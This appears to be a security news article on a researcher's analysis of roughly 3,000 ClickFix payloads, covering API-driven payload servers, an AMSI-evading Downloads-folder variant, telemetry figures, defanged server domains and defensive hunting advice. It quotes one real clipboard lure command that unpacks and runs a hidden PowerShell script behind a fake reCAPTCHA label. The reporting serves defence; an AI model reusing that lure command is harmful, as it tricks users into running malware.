Skip to main content
Emerging ThreatsMalware & Ransomware

Researcher Exposes API-Driven Malware Delivery in ClickFix Campaigns

Security researcher analyzing a small device under a focused light in a lab.

"ClickFix is here to stay," security researcher Bert‑Jan Pals concluded after dissecting thousands of live payloads — and his data explains why the trick keeps adapting faster than defenders can harden against it.

Bert‑Jan Pals' analysis of roughly 3,000 live payloads

Pals presented his findings at OrangeCon in early June and published the full analysis on June 30. He took apart several ClickFix platforms and examined about 3,000 payloads from active campaigns. His work documents a broad, evolving set of delivery patterns that move the malicious action off the page and into a backend service that issues commands on demand.

API‑driven payload servers: fresh disguises on every request

Pals found that many ClickFix pages no longer embed static clipboard commands. Instead they call backend servers that operate like an on‑demand API: requests are checked for an access token, the caller is logged, and the server returns a freshly scrambled command each time. When Pals requested 100 payloads from one server, he received 100 different wrappers. The wrappers rotated among Base64, AES, TripleDES, Rijndael and Deflate encodings, but — at least in the samples he analyzed — all unpacked to the same script that executes in memory through a PowerShell runspace.

The platforms serve lures in 25 languages and match the command to the visitor's operating system, with macOS payloads appearing alongside Windows versions. Pals also observed a commercialization layer: ESET had already tracked criminal sellers offering ClickFix builders, and Pals found the payload‑generation step itself being run as a service that churns out per‑visitor disguises.

Downloads‑folder method and a quieter bypass of AMSI

Pals documented a newer delivery variant that slips past defenders who watch the clipboard for obvious malicious commands. Rather than pasting the full payload, the page downloads a file to the user's Downloads folder and places a short "orchestrator" one‑liner in the clipboard that moves, unpacks, and runs the downloaded archive. Because the clipboard contains only that orchestrator line — not the payload body — the approach is built to avoid AMSI script scanning. One observed clipboard line looked like this:

powershell -C "$t=$env:TMP;Move-Item \"$HOME\Downloads\tmp.zip\" \"$t\7947.zip\";tar -xf \"$t\7947.zip\" -C \"$t\";conhost --headless powershell -ExecutionPolicy Bypass -File \"$t\tmp.ps1\" # \"* I am not a robot reCAPTCHA Verification ID:7947 *\""

Pals also noted an execution change: the original lures told victims to press Windows+R and paste into the Run box; versions common through 2025 and into 2026 instead direct users to Windows+X and the Windows Terminal. Terminal use looks more ordinary and, unlike the Run box, leaves no trace in the RunMRU registry key investigators commonly check.

Launchers, telemetry and scale: what the data shows

Pals emphasized that reliable defensive signals are behavioral process chains rather than clipboard contents. The common pattern is explorer.exe or WindowsTerminal.exe spawning powershell.exe, cmd.exe, or msiexec.exe and then network activity shortly afterward. In Pals' dataset, PowerShell and cmd were each tied to about 39% of launches, with msiexec close behind at 34%.

The technique has shown striking growth and operational breadth in other firms' telemetry: ESET measured a 517% jump from late 2024 into the first half of 2025, and Microsoft's 2025 Digital Defense Report put ClickFix at 47% of initial‑access cases handled by its Defender Experts team. Proofpoint tied state‑backed groups from Russia, Iran, and North Korea — including APT28, MuddyWater, and Kimsuky — to campaigns that dropped ClickFix into existing infection chains, and North Korean crews built a "ClickFake Interview" variant targeting cryptocurrency workers. Security firm Expel reported one ClearFake wave that likely infected as many as 147,521 systems since late August 2025.

Pals listed three payload servers he observed: comicstar[.]lat, babybon[.]cfd and merkantalolol[.]asia. He cautioned that a connection to one of these hosts does not prove infection; it means a command was most likely placed in someone's clipboard.

What this means for security teams, enterprises, and nation‑state actors

  • Security teams and technologists: Pals highlights behavioral EDR, application‑control rules that limit which programs can call script interpreters, and process‑chain hunting. Specifically, defenders should hunt for one‑liners that touch the Downloads folder and then spawn a hidden PowerShell, and watch for explorer.exe or WindowsTerminal.exe launching powershell.exe, cmd.exe or msiexec.exe followed by network connections.
  • Enterprises and end users: The basic guidance remains effective: "never paste a command you were told to run into the Run box or a terminal." The platforms deliver lures in many languages and produce macOS as well as Windows commands, so simple user‑facing rules and training still matter across diverse user populations.
  • Nation‑state and criminal operators: Proofpoint and Pals both document that state‑backed groups and organized criminals are integrating ClickFix and related variants (FileFix, DownloadFix, ClickFake, ClearFake) into broader chains. Pals warns that the move from disposable wrappers to API‑driven payload servers keeps adaptation cheap to repeat — and that the immediate next risk is the malware itself beginning to vary per victim.

Pals' blunt assessment — "ClickFix is here to stay" — is backed by rapid adoption, backend automation and evolving evasions that shift the defensive emphasis from text in the clipboard to what processes do next. The critical next question, he argues, is whether the core payload will start changing from one victim to the next; if it does, defenders will face a faster, more fragmented problem than the current single‑payload‑under‑many‑wrappers model.

Original reporting: The Hacker News — Researcher Analyzes 3,000 Live ClickFix Payloads, Exposing API-Driven Malware Delivery (June 30, 2026)